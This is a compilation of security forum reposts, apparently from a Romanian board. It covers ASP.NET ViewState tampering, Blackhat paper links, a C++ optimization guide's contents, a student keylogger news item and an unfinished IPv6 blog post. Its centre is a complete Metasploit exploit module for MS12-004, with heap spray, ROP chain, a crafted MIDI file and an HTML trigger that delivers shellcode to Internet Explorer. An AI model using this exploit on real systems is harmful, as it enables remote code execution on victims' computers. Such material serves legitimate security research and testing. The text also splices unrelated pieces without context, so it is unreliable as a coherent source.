Nytro

Da, nasol, trebuie sa dea "Allow" la plugin... Dar cred ca merge si creand un fisier MIDI, iar victima sa il deschida cu Media Player. Daca se mai poate folosi si o alta extensie, e perfect.

Am vazut, felicitari. PS: A se vedea si cateva detalii tehnice: VUPEN Vulnerability Research Blog - Advanced Exploitation of Internet Explorer Heap Overflow Vulnerabilities (MS12-004 / CVE-2012-0003)

[h=3]VIEWSTATE Vulnerabilities[/h][h=2]Friday, January 27, 2012[/h] 1. ViewState Overview "View state is a method that the ASP.NET page framework uses to preserve page and control values between round trips. When the HTML markup for the page is rendered, the current state of the page and values that must be retained during postback are serialized into base64-encoded strings. This information is then put into the view state hidden field or fields." MSDN "What does ViewState do? - Stores values per control by key name, like a Hashtable - Tracks changes to a ViewState value's initial state - Serializes and deserializes saved data into a hidden form field on the client - Automatically restores ViewState data on postbacks" From an article on the ViewState mechanisms by an ASP.NET developer To put it even simplier, ViewState is a hidden HTML parameter that sends a current structure of page content to the server. Example of use: retaining form field values on the page for by-page list scrolling. Though there are widely used methods of disabling or avoiding ViewState (usually, by means of a DBMS), this mechanism is built in ASP.NET by default and is often misused: "Even more important than understanding what it does, is understanding what it does NOT do: What doesn’t ViewState do? - Automatically retain state of class variables (private, protected, or public) - Remember any state information across page loads (only postbacks) - Remove the need to repopulate data on every request - ViewState is not responsible for the population of values that are posted such as by TextBox controls (although it does play an important role)" From an article on the ViewState mechanisms by an ASP.NET developer Obviously, such misuse entails more serious problems, such as a missing filtration or a perverted idea of how the web application should work properly. Developers tend to believe that if ViewState is a serialized structure, moreover, a base64-encrypted one, no attacker will be able to get to its contents. However, the truth is, if the encryption and the data integrity check (MAC) are disabled, accessing the content is much simplier than it seems. Let’s decode base64: Pic. 1. Decoding VIEWSTATE by means of base64_decoder. Then, open it in the Hex Editor. Now it is evident that any string variable is preceded by bytes that indicate the string’s length (the number of bites depends on the length of the string: a string less than 128 bytes will have one byte for a variable length). Pic. 2. Spoofing content of the serialized structure. Authoritative resources state that ASP.NET versions earlier than 2.0 use LosFormatter as a serialization/deserialization algorithm, while version 2.0 and later use ObjectStateFormatter. Thus, to change the variable, one needs to define the length of a new string, overwrite the string, overwrite the byte (bytes) with the string length, encode it back with base64 and insert into __VIEWSTATE. Pic. 3. Spoofing content of the serialized structure. 2. Vulnerabilities and attacks Combined with a low-level knowledge of an average specialist about a correct and secure configuration of web applications, such approach generates the following vulnerabilities and provides opportunities for the following attacks: • Cross-Site Scripting (XSS) • Content Spoofing • SQL Injection • Information Leakage • Logical Attacks • ViewState Vulnerabilities as such • Other vulnerabilities 2.1. Cross-Site Scripting, Content Spoofing The possibility of content spoofing for an HTML page comes out of ViewState main purpose, i.e. to preserve page and control values. If data from ViewState placed into the HTTP response body are not filtered properly, it results in Content Spoofing and/or Cross-Site Scripting. Vulnerable configuration: EnableViewStateMac=false ViewStateEncryptionMode=never|auto (Depends on RegisterRequiresViewStateEncryption) ViewStateUserKey=EMPTY 2.2. Information Leakage, Logical Attacks If developer does not encrypt the VIEWSTATE parameter (Securing View State), an attacker can decode the VIEWSTATE structure and extract confidential data. If developer does not check data integrity (MAC), an attacker can change parameters that can influence the web application logic, thus facilitating Authentication Bypass, Authorization Bypass, and Abuse of Functionality. Vulnerable configuration: ViewStateEncryptionMode=never|auto EnableViewStateMac=false|true 2.3. Attacks Against ViewState The ViewState itself is also vulnerable to attacks. For example, September, 2010 saw a publication describing a vulnerability that allowed decrypting AES-encrypted ViewState by sending numerous requests to a server and tracking various error codes (Important: ASP.NET Security Vulnerability - ScottGu's Blog). Besides, the earlier versions (1.0, 1.1) are vulnerable to the Denial Of Service (DoS) attacks (against unencrypted VIEWSTATE) and the Replay attacks (against encrypted VIEWSTATE). The latter one is an attack against a cryptographic protocol consisting in resending an intercepted package that will be received appropriately, thus breaking the algorithm. These attacks were described by Michal Zalewski as far as in 2005 (Bugtraq: ASP.NET __VIEWSTATE crypto validation prone to replay attacks). 2.4. Other Vulnerabilities All other vulnerabilities common for web applications, such as SQL injection, OS Commanding, as well as other vulnerabilities of such types as Code Exploitation, Information Disclosure, etc. can and should be checked both in variables of the ViewState structure and in ordinary variables sent by GET/POST/COOKIES. Vulnerable configuration: EnableViewStateMac=false ViewStateEncryptionMode=never|auto (depends on RegisterRequiresViewStateEncryption) 3. Protection 3.1. EnableViewStateMac Default: TRUE Since: 1.0 Enables MAC (Machine Authentication Check) to check the VIEWSTATE parameter values by means of a checksum. Set the EnableViewStateMac property to "True" in the Page element. Besides, the activation requires configuring the validationKey and validation properties of the machineKey element. The following in-built encrypting algorithms are supported: SHA1, MD5, 3DES, AES, HMACSHA256, HMACSHA384, HMACSHA512. 3.2. ViewStateEncryptionMode Default: Auto Since: 2.0 Allows encrypting the VIEWSTATE parameter by any of the following algorithms: DES, 3DES, AES. For activation, configure the decryptionKey and decryption properties of the machineKey element. 3.3. ViewStateUserKey Default: EMPTY Since: 1.1 Not everyone knows that ViewState protects not only itself against spoofing, but the entire application against CSRF by means of the ViewStateUserKey parameter. ViewStateUserKey is just a protection mechanism. It is a developer’s duty to ensure its unpredictable and random nature. Set the ViewStateUserKey property to "String" in the Page element. 4. Conclusion Sections 2 and 3 provide sound evidence that, configured by default, ViewState is secured against vulnerabilities that are not 0-day. However, quite often developers, after having struggled with constantly appearing error notifications about integrity violation, faulty arguments, etc., end up disabling keys that provoke errors, thus leaving the application vulnerable to various attacks. Yet, if the web application is properly configured, the probability of errors and even vulnerabilities can be minimized down to 0. Sursa: [Positive Technologies] Research Lab: VIEWSTATE Vulnerabilities

Intercepting GSM traffic Pe scurt, cateva idei, prezentare de la Blackhat Europe 2008. Download: http://www.blackhat.com/presentations/bh-europe-08/Steve-DHulton/Whitepaper/bh-eu-08-steve-dhulton-WP.pdf

Biologger - A Biometric Keylogger O idee interesanta, prezentare de la Blackhat Europe 2008. Download: http://www.blackhat.com/presentations/bh-europe-08/Lewis/Whitepaper/bh-eu-08-lewis-WP.pdf

Optimizing software in C++ An optimization guide for Windows, Linux and Mac platforms By Agner Fog. Copenhagen University College of Engineering. Copyright © 2004 - 2011. Last updated 2011-06-08. Contents 1 Introduction ....................................................................................................................... 3 1.1 The costs of optimizing ............................................................................................... 4 2 Choosing the optimal platform........................................................................................... 4 2.1 Choice of hardware platform....................................................................................... 4 2.2 Choice of microprocessor ........................................................................................... 6 2.3 Choice of operating system......................................................................................... 6 2.4 Choice of programming language ............................................................................... 8 2.5 Choice of compiler .................................................................................................... 10 2.6 Choice of function libraries........................................................................................ 12 2.7 Choice of user interface framework........................................................................... 14 2.8 Overcoming the drawbacks of the C++ language...................................................... 14 3 Finding the biggest time consumers ................................................................................ 16 3.1 How much is a clock cycle? ...................................................................................... 16 3.2 Use a profiler to find hot spots .................................................................................. 16 3.3 Program installation .................................................................................................. 18 3.4 Automatic updates .................................................................................................... 19 3.5 Program loading ....................................................................................................... 19 3.6 Dynamic linking and position-independent code ....................................................... 19 3.7 File access................................................................................................................21 3.8 System database ...................................................................................................... 22 3.9 Other databases ....................................................................................................... 22 3.10 Graphics ................................................................................................................. 22 3.11 Other system resources.......................................................................................... 22 3.12 Network access ...................................................................................................... 22 3.13 Memory access....................................................................................................... 23 3.14 Context switches..................................................................................................... 23 3.15 Dependency chains ................................................................................................ 23 3.16 Execution unit throughput ....................................................................................... 23 4 Performance and usability ............................................................................................... 24 5 Choosing the optimal algorithm....................................................................................... 25 6 Development process...................................................................................................... 26 7 The efficiency of different C++ constructs........................................................................ 27 7.1 Different kinds of variable storage............................................................................. 27 7.2 Integers variables and operators............................................................................... 30 7.3 Floating point variables and operators ...................................................................... 32 7.4 Enums ......................................................................................................................34 7.5 Booleans................................................................................................................... 34 7.6 Pointers and references............................................................................................ 36 7.7 Function pointers ...................................................................................................... 38 7.8 Member pointers....................................................................................................... 38 7.9 Smart pointers .......................................................................................................... 38 7.10 Arrays ..................................................................................................................... 39 7.11 Type conversions.................................................................................................... 41 7.12 Branches and switch statements............................................................................. 44 7.13 Loops...................................................................................................................... 46 2 7.14 Functions ................................................................................................................ 48 7.15 Function parameters ............................................................................................... 50 7.16 Function return types .............................................................................................. 51 7.17 Structures and classes............................................................................................ 51 7.18 Class data members (properties) ............................................................................ 52 7.19 Class member functions (methods)......................................................................... 53 7.20 Virtual member functions ........................................................................................ 54 7.21 Runtime type identification (RTTI)........................................................................... 54 7.22 Inheritance.............................................................................................................. 54 7.23 Constructors and destructors .................................................................................. 55 7.24 Unions ....................................................................................................................56 7.25 Bitfields................................................................................................................... 56 7.26 Overloaded functions .............................................................................................. 57 7.27 Overloaded operators ............................................................................................. 57 7.28 Templates............................................................................................................... 57 7.29 Threads .................................................................................................................. 60 7.30 Exceptions and error handling ................................................................................ 61 7.31 Other cases of stack unwinding .............................................................................. 65 7.32 Preprocessing directives......................................................................................... 65 7.33 Namespaces........................................................................................................... 65 8 Optimizations in the compiler .......................................................................................... 66 8.1 How compilers optimize ............................................................................................ 66 8.2 Comparison of different compilers............................................................................. 74 8.3 Obstacles to optimization by compiler....................................................................... 77 8.4 Obstacles to optimization by CPU............................................................................. 80 8.5 Compiler optimization options ................................................................................... 81 8.6 Optimization directives.............................................................................................. 82 8.7 Checking what the compiler does ............................................................................. 84 9 Optimizing memory access ............................................................................................. 87 9.1 Caching of code and data ......................................................................................... 87 9.2 Cache organization................................................................................................... 87 9.3 Functions that are used together should be stored together...................................... 88 9.4 Variables that are used together should be stored together ...................................... 88 9.5 Alignment of data...................................................................................................... 90 9.6 Dynamic memory allocation...................................................................................... 90 9.7 Container classes ..................................................................................................... 92 9.8 Strings ...................................................................................................................... 95 9.9 Access data sequentially .......................................................................................... 96 9.10 Cache contentions in large data structures ............................................................. 96 9.11 Explicit cache control .............................................................................................. 99 10 Multithreading.............................................................................................................. 101 10.1 Hyperthreading ..................................................................................................... 102 11 Out of order execution................................................................................................. 103 12 Using vector operations............................................................................................... 105 12.1 AVX instruction set and YMM registers................................................................. 105 12.2 Automatic vectorization......................................................................................... 106 12.3 Explicit vectorization ............................................................................................. 108 12.4 Mathematical functions for vectors........................................................................ 121 12.5 Aligning dynamically allocated memory................................................................. 124 12.6 Aligning RGB video or 3-dimensional vectors ....................................................... 124 12.7 Conclusion............................................................................................................ 124 13 Making critical code in multiple versions for different CPUs......................................... 125 13.1 CPU dispatch strategies........................................................................................ 125 13.2 Difficult cases........................................................................................................ 127 13.3 Test and maintenance .......................................................................................... 129 13.4 Implementation ..................................................................................................... 129 13.5 CPU dispatching in Gnu compiler ......................................................................... 131 13.6 CPU dispatching in Intel compiler ......................................................................... 132 3 14 Specific optimization tips ............................................................................................. 138 14.1 Use lookup tables ................................................................................................. 138 14.2 Bounds checking .................................................................................................. 140 14.3 Use bitwise operators for checking multiple values at once................................... 141 14.4 Integer multiplication............................................................................................. 142 14.5 Integer division...................................................................................................... 143 14.6 Floating point division ........................................................................................... 145 14.7 Don’t mix float and double..................................................................................... 146 14.8 Conversions between floating point numbers and integers ................................... 146 14.9 Using integer operations for manipulating floating point variables......................... 148 14.10 Mathematical functions ....................................................................................... 151 15 Metaprogramming ....................................................................................................... 152 16 Testing speed.............................................................................................................. 155 16.1 The pitfalls of unit-testing ...................................................................................... 157 16.2 Worst-case testing ................................................................................................ 157 17 Optimization in embedded systems............................................................................. 159 18 Overview of compiler options....................................................................................... 161 19 Literature..................................................................................................................... 164 20 Copyright notice .......................................................................................................... 165 Download: http://www.agner.org/optimize/optimizing_cpp.pdf

MS12-004 midiOutPlayNextPolyEvent Heap Overflow Authored by sinn3r, juan vazquez, Shane Garrett | Site metasploit.com Posted Jan 28, 2012 This Metasploit module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player's ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either "inc al" or "dec al" a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "MS12-004 midiOutPlayNextPolyEvent Heap Overflow", 'Description' => %q{ This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player's ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either "inc al" or "dec al" a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop. }, 'License' => MSF_LICENSE, 'Author' => [ 'Shane Garrett', #Initial discovery (IBM X-Force) 'juan vazquez', 'sinn3r', ], 'References' => [ [ 'MSB', 'MS12-004'], [ 'CVE', '2012-0003' ], [ 'OSVDB', '78210'], [ 'BID', '51292'], [ 'URL', 'http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php' ], ], 'Payload' => { 'Space' => 1024, }, 'DefaultOptions' => { 'EXITFUNC' => "process", 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Rop' => false, 'DispatchDst' => 0x0c0c0c0c } ], [ 'IE 7 on Windows XP SP3', { 'Rop' => false, 'DispatchDst' => 0x0c0c0c0c } ], [ 'IE 8 on Windows XP SP3', { # xchg ecx,esp # or byte ptr [eax],al # add byte ptr [edi+5Eh],bl # ret 8 # From IMAGEHLP 'Rop' => true, 'StackPivot' => 0x76C9B4C2, 'DispatchDst' => 0x0c0c1be4 } ], ], 'Privileged' => false, 'DisclosureDate' => "Jan 10 2012", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(request) agent = request.headers['User-Agent'] vprint_status("Request from: #{agent}") if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/ #Windows XP SP3 + IE 6.0 return targets[1] elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/ #Windows XP SP3 + IE 7.0 return targets[2] elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ #Windows XP SP3 + IE 8.0 + JRE6 return targets[3] else return nil end end def get_midi # MIDI Fileformat Reference: # http://www.sonicspot.com/guide/midifiles.html # # Event Types: # 0x08 = Note Off (when MIDI key is released) # 0x09 = Note On (when MIDI key is pressed) # 0x0A = Note aftertouch (pressure change on the pressed MIDI key) # 0x0B = Controller Event (MIDI channels state) # 0x0C = Program change (Which instrument/patch should be played on the MIDI channel) # 0x0D = Channel aftertouch (similar to Note Aftertouch; effects all keys pressed on the specific MIDI channel) # 0x0E = Pitch Bend (similiar to a controller event; has 2 bytes to describe its value) # 0x0F = Meta Events (not sent or received over a midi port) # Structure: # [Header Chunk][Track Chunk][Meta Event][Meta Event][SYSEX Event][Midi Channel Event) # Problem: # Windows Media Player fails to manage Note On and Note Off Events # Track Chunk Data tc = "\x00\xFF\x03\x0D\x44\x72\x75\x6D" # Meta Event - Sequence/Track Name tc << "\x73\x20\x20\x20\x28\x42\x42\x29\x00" # Midi Channel Event - Program Change tc << "\x00\xC9\x28" # Midi Channel Event - Controller tc << "\x00\xB9\x07\x64" # Midi Channel Event - Controller tc << "\x00\xB9\x0A\x40" # Midi Channel Event - Controller tc << "\x00\xB9\x7B\x00" # Midi Channel Event - Controller tc << "\x00\xB9\x5B\x28" # Midi Channel Event - Controller tc << "\x00\xB9\x5D\x00" # Midi Channel Event - Note On tc << "\x85\x50\x99\x23\x7F" # Corruption events # Midi Channel Event - Note On tc << "\x00\x9F\xb2\x73" # Ends Corruption events # Meta Event - End Of Track tc << "\x00\xFF\x2F\x00" m = '' # HEADERCHUNK Header m << "MThd" # Header m << "\x00\x00\x00\x06" # Chunk size m << "\x00\x00" # Format Type m << "\x00\x01" # Number of tracks m << "\x00\x60" # Time division # TRACKCHUNK header m << "MTrk" # Header m << [tc.length].pack('N') m << tc midi_name = "test_case.mid" return midi_name, m end def on_request_uri(cli, request) if request.uri =~ /\.mid$/i print_status("Sending midi file to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, @midi, {'Content-Type'=>'application/octet-strem'}) return end #Set default target my_target = target #If user chooses automatic target, we choose one based on user agent if my_target.name =~ /Automatic/ my_target = get_target(request) if my_target.nil? send_not_found(cli) print_error("#{cli.peerhost}:#{cli.peerport} Unknown user-agent") return end vprint_status("Target selected: #{my_target.name}") end midi_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource midi_uri << "/#{@m_name}" spray = build_spray(my_target) if datastore['OBFUSCATE'] spray = ::Rex::Exploitation::JSObfu.new(spray) spray.obfuscate end trigger = build_trigger(my_target) trigger_fn = "trigger" if datastore['OBFUSCATE'] trigger = ::Rex::Exploitation::JSObfu.new(trigger) trigger.obfuscate trigger_fn = find_trigger_fn(trigger.to_s) end html = %Q| <html> <head> <script language='javascript'> #{spray} </script> <script language='javascript'> #{trigger} </script> <script for=audio event=PlayStateChange(oldState,newState)> if (oldState == 3 && newState == 0) { #{trigger_fn}(); } </script> </head> <body> <object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95"> <param name="fileName" value="#{midi_uri}"> <param name="SendPlayStateChangeEvents" value="true"> <param NAME="AutoStart" value="True"> <param name="uiMode" value="mini"> <param name="Volume" value="-300"> </object> </body> </html> | html = html.gsub(/^\t\t/, '') print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {'Content-Type'=>'text/html'}) end def exploit @m_name, @midi = get_midi super end def build_spray(my_target) # Extract string based on target if my_target.name == 'IE 8 on Windows XP SP3' js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);" else js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);" end # Build shellcode based on Rop requirement if my_target['Rop'] code = create_rop_chain(my_target) code << payload.encoded shellcode = Rex::Text.to_unescape(code) else code = payload.encoded shellcode = Rex::Text.to_unescape(code) end # 1. Create big block of nops # 2. Compose one block which is nops + shellcode # 3. Repeat the block # 4. Extract string from the big block # 5. Spray spray = <<-JS var heap_obj = new heapLib.ie(0x10000); var code = unescape("#{shellcode}"); var nops = unescape("%u0c0c%u0c0c"); while (nops.length < 0x1000) nops+= nops; var shellcode = nops.substring(0,0x800 - code.length) + code; while (shellcode.length < 0x40000) shellcode += shellcode; #{js_extract_str} heap_obj.gc(); for (var i=0; i < 600; i++) { heap_obj.alloc(block); } JS spray = heaplib(spray, {:noobfu => true}) return spray end # Build the JavaScript string for the attributes def build_element(element_name, my_target) dst = Rex::Text.to_unescape([my_target['DispatchDst']].pack("V")) element = '' if my_target.name =~ /IE 8/ max = 63 # Number of attributes for IE 8 index = 1 # Where we want to confuse the type else max = 55 # Number of attributes for before IE 8 index = 0 # Where we want to confuse the type end element << "var #{element_name} = document.createElement(\"select\")" + "\n" # Build attributes 0.upto(max) do |i| obj = (i==index) ? "unescape(\"#{dst}\")" : "alert" element << "#{element_name}.w#{i.to_s} = #{obj}" + "\n" end return element end # Feng Shui and triggering Steps: # 1. Run the garbage collector before allocations # 2. Defragment the heap and alloc CImplAry objects in one step (objects size are IE version dependent) # 3. Make holes # 4. Let windows media play the crafted midi file and corrupt the heap # 5. Force the using of the confused tagVARIANT. def build_trigger(my_target) if my_target.name == 'IE 8 on Windows XP SP3' # Redoing the feng shui if fails makes it reliable js_trigger = <<-JSTRIGGER function trigger(){ var k = 999; while (k > 0) { if (typeof(clones[k].w1) == "string") { } else { clones[k].w1('come on!'); } k = k - 2; } feng_shui(); document.audio.Play(); } JSTRIGGER select_element = build_element('selob', my_target) else js_trigger = <<-JSTRIGGER function trigger(){ var k = 999; while (k > 0) { if (typeof(clones[k].w0) == "string") { } else { clones[k].w0('come on!'); } k = k - 2; } feng_shui(); document.audio.Play(); } JSTRIGGER select_element = build_element('selob', my_target) end trigger = <<-JS var heap = new heapLib.ie(); #{select_element} var clones=new Array(1000); function feng_shui() { heap.gc(); var i = 0; while (i < 1000) { clones[i] = selob.cloneNode(true) i = i + 1; } var j = 0; while (j < 1000) { delete clones[j]; CollectGarbage(); j = j + 2; } } feng_shui(); #{js_trigger} JS trigger = heaplib(trigger, {:noobfu => true}) return trigger end def find_trigger_fn(trigger) fns = trigger.scan(/function ([a-zA-Z0-9_]+)\(\)/) if fns.nil? or fns.empty? return "trigger" else return fns.last.first end return "trigger" end def junk(n=1) tmp = [] value = rand_text(4).unpack("L")[0].to_i n.times { tmp << value } return tmp end # ROP chain copied from ms11_050_mshtml_cobjectelement.rb (generated by mona) # Added a little of roping to adjust the stack pivoting for this case # Specific for IE8 XP SP3 case at this time def create_rop_chain(my_target) rop_gadgets = [ 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] my_target['StackPivot'], # stackpivot junk, # padding 0x7c376402, # POP EBP # RETN [msvcr71.dll] 0x7c376402, # skip 4 bytes [msvcr71.dll] 0x7c347f97, # POP EAX # RETN [msvcr71.dll] 0xfffff800, # Value to negate, will become 0x00000201 (dwSize) 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] 0x7c354901, # POP EBX # RETN [msvcr71.dll] 0xffffffff, 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 0x7c344f87, # POP EDX # RETN [msvcr71.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] 0x7c34d201, # POP ECX # RETN [msvcr71.dll] 0x7c38b001, # &Writable location [msvcr71.dll] 0x7c34b8d7, # POP EDI # RETN [msvcr71.dll] 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] 0x7c364802, # POP ESI # RETN [msvcr71.dll] 0x7c3415a2, # JMP [EAX] [msvcr71.dll] 0x7c347f97, # POP EAX # RETN [msvcr71.dll] 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll] ].flatten.pack('V*') return rop_gadgets end end Sursa: MS12-004 midiOutPlayNextPolyEvent Heap Overflow ? Packet Storm

[h=2]Students busted for hacking computers, changing grades[/h]By Iain Thomson in San Francisco Three high school juniors have been arrested after they devised a sophisticated hacking scheme to up their grades and make money selling quiz answers to their classmates. The students are accused of breaking into the janitor’s office of California's Palos Verdes High School and making a copy of the master key, giving them access to all the classrooms. They then attached keylogging hardware to the computers of four teachers, and harvested the passwords needed to access the central files of the school network. They then used that access to change their grades slightly, nudging them up by increments so that all three got As. At the time they were caught, keyloggers were found on three other teachers’ systems, indicating the group was expanding its efforts. "They were pretty smart," Palos Verdes Estates police Sgt. Steve Barber told the Daily Breeze. "They knew exactly what to do with the computers. The scores wouldn't go up a whole lot, but enough to change their grade. They didn't want to make it real apparent something was going on." The three didn’t just confine themselves to computer hacking. They're also accused of using the master key to pilfer around 20 tests before they were given – they then worked out the answers and sold them to other students. This scam only came to light when another student heard of the offer and snitched to the school principal. "They were very bright kids," said Principal Nick Stephany. "They were in AP and honors classes. Am I shocked? Yeah. Definitely by the extent of it. None of these kids had any real trouble before." Two students have been expelled over the incident, and others are to be disciplined for receiving stolen goods. The school has also upgraded its security and has advised teachers to change their passwords. Sursa: Students busted for hacking computers, changing grades • The Register

[h=2]IPv6 at home, Part 1: Overview, Teredo[/h] [Edit 2010-02-25 - adding some forward links to the other parts of this series. Rewrote parts - no more mention of how slow Teredo is (it's not), and some updated comments to reflect the state of ipv6 in 2010] This blog post is part of a series on ipv6. In this part, I provide an overview of ipv6 and look at Teredo, the technology built into Windows Vista/7; in part 2, I look at AYIYA tunnels through aiccu, using sixxs net as a tunnel broker. Part 2.5 is a collection of useful ipv6 tidbits, and part 3 gets back to the original plan: Exploring ipv6 connectivity options – in this case, the tunnel offered by gogonet. NB: The tunnel described in part 3 is a lot easier to set up than Teredo. It was never my intent to advocate the use of Teredo as the prevalent way to connect a machine to IPv6. I started with it in this series precisely because I thought it would be the least comfortable option. In hindsight, I should probably have started with the easy button. Part 4 describes Hurricane Electric 6in4 tunnels, and part 4.1 shows how to set one up on a Juniper ScreenOS device. [JunOS tunnels, as opposed to ScreenOS tunnels, are shaky at this point, they work in 10.3r1, but not in 10.2r3 or 10.4r1. I may describe them when this situation has settled down a bit] For a corporate environment, I take a look at ipv6 renumbering. If you are planning to deploy ipv6 in your network, you need to think about this. [h=2]Overview[/h] I’ve been running IPv6 at home since January 2008. When I took the plunge, I did so mainly to learn about the technology in preparation of it being adopted in the field. Factors that made me finally take this step in January 2008, as opposed to pondering it since January 2001, were: The government mandate to deploy IPv6 in federal networks, while weak, will undoubtedly bring IPv6 adoption into some enterprises. When this happens, I want to be ready, and I want my team to be ready, so we can capitalize on our knowledge and can claim to have been running IPv6 since early 2008. We’re deploying Juniper SSG-5 firewalls at our techies’ homes, and these little boxes do now support IPv6 with the release of software version 6.0.0. I could have been running IPv6 using a software client, but that would have done little to prepare me for seeing it deployed in an environment I will actually encounter – namely, hardware firewalls and routers. Four of the Internet DNS root servers are now reachable through IPv6. For the first time ever, this would allow a connection between IPv6 hosts that relies purely on IPv6. This is less a technical concern than a measure of where we are with IPv6: The root servers were the last “you can’t DO IPv6 without IPv4 first” holdout, and that’s gone now. When the root servers, who are very conservative, move, it’s time for mere mortals to test the waters, too. Since most folk won’t have IPv6-capable hardware firewalls at home, I will talk about host – specifically, PC – based solutions to connect to IPv6 sites to start out with. All right, starting with: What is IPv6, and why do I care? At its core, IPv6 is simply “more address space”. The “old way” of addressing, called IPv4, with its 32-bit address space, is running out of space to use, even with the use of NAT. Predictions claim we may run out of space as early as 2012, though I would not be surprised to see us “hang on” a little longer. IPv6 in contrast has a 128-bit address space, which is ridiculously huge. This has some implications: IPv6 will rely on DNS to an even greater degree than IPv4. Let me take the example of go6.net. Its IPv6 address is 2001:5c0:0:1::6. The ‘::’ is a way of saying “multiple zeros here” in IPv6, to shorten writing it. That’s actually a fairly neat and short address, but still hard to memorize. A less ‘neat’ address may look like 2001:470:1f06:223:bd6f:6f5c:a458:2802. Good luck memorizing that one. We’ll need names, and good reverse DNS, and good DDNS. Because we have so much address space now, IPv6 does away with IPv4-style subnetting. In IPv6, every subnet is a /64. That is 16 quintillion addresses, up from 4 billion in the entire IPv4 range. And that’s just for one subnet. The goal is to avoid the pain of different-sized subnets – needing to wrestle with /26, /28 and /29 – and the even greater pain of having to change subnets, say going from a /29 to a /28 because you ran out of space and have now a few machines more than you envisioned. The IPv6 /64 subnet range is envisioned to cover all devices that could possibly be hooked up to the physical medium that carries that subnet. “Leaf nodes” – that is, sites that aren’t large carrier-grade – will receive a /48, which can then be carved up into individual /64s. This will allow for 65,000+ subnets per site, which will be plenty even for large corporations. A /48 is also what you might receive at home, depending on how you connect to IPv6. Lots of address space also means we don’t need private addresses any more. This does away with NAT, which makes life hugely simpler for applications. VPNs become easier, and protocols that embed IP information – notoriously, all the VOIP stuff like H.323 and SIP, as well as Microsoft’s SMB file-sharing protocol – also benefit. As do P2P and game applications, BTW – no more need to configure “port forwards” for these. This also means that firewalling is a must. While NAT was never meant to be a security feature, PAT or Hide-NAT in particular, as implemented in home routers, was often touted as a “firewall” feature by vendors, because by its nature, it disallows incoming connections. There are huge application-level challenges in interop, too, and I’ll get to those. So, how does an IPv6 host talk to an IPv4 host, or vice versa? The answer is “with difficulty”, if at all. Proposals for rewriting addressing on-the-fly are technically brittle. Particularly when it comes to those applications mentioned that embed IP addresses, like H.323 and SIP and SMB, rewriting that data stream is not very feasible, and not at all scalable. The best idea proposed so far has been to “dual-stack” IPv6-capable equipment: Any given host would have both an IPv6 address and an IPv4 address. It will talk to IPv4 hosts using IPv4, and to IPv6 hosts using IPv6. That is a workable way around those application-level interop challenges. At some point, of course, one would have to either phase out IPv4 or bite the bullet and do application-layer translation for those clients that are still IPv4-only. For DNS, what you need to know is: IPv4 records are A records, IPv6 records are AAAA records. Any given host can have one, the other, or both. go6.net has both, google.com has only IPv4, and IPv6-only hosts such as ipv6.google.com are extremely rare right now. Who in their right mind, after all, would limit content to a tiny portion of the Internet users. Windows XP will always use IPv4 to query DNS servers. Even to get an AAAA record, the actual query will run over IPv4. Windows Vista can run IPv6-native and query DNS over IPv6. Both Windows XP and Windows Vista will advertise their IPv6 address as a DDNS update. If you run your own DNS server at home and it is IPv6-capable, it should pick up the addresses of your IPv6 hosts. [h=2]Connecting to IPv6[/h] Alright, so how do you connect to, say, a web server, using IPv6? Your home router does not know IPv6, and even if it does, your ISP’s router is most likely not configured for IPv6, and would not forward your IPv6 packets. Therefore, you have three ways to get to IPv6 hosts, two of which are actually going to be available for most people at this point. Native IPv6. Your ISP supplies you with IPv6 address space and does all the hard work for you. Rejoice, you are done! Just 